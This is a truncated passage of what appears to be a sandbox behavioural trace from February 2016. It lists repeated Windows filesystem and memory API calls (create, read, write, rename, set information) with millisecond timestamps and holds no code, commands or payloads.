"filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,861", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,871", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,891", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,901", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,911", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,931", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,931", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,931", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,941", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,951", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,951", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,951", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,961", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,961", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,961", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,961", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:42:01,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,981", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,991", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:02,001", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,001", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,011", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": 
"NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,021", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,031", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,031", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,031", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,031", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,031", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,041", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,051", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:02,051", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,051", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,061", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,061", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,061", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,071", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,071", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,071", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,101", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,101", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,101", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,101", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,111", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,111", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:02,111", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,121", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,121", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,121", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,131", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,142", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:02,142", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,152", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,162", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,172", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,182", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,192", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,202", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,212", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,222", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,232", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,232", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,232", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,232", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,232", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,242", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:02,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,262", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,262", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,262", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,262", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,262", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,272", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,272", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,272", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,272", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,282", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,302", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,302", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,302", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,302", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,302", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,302", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": 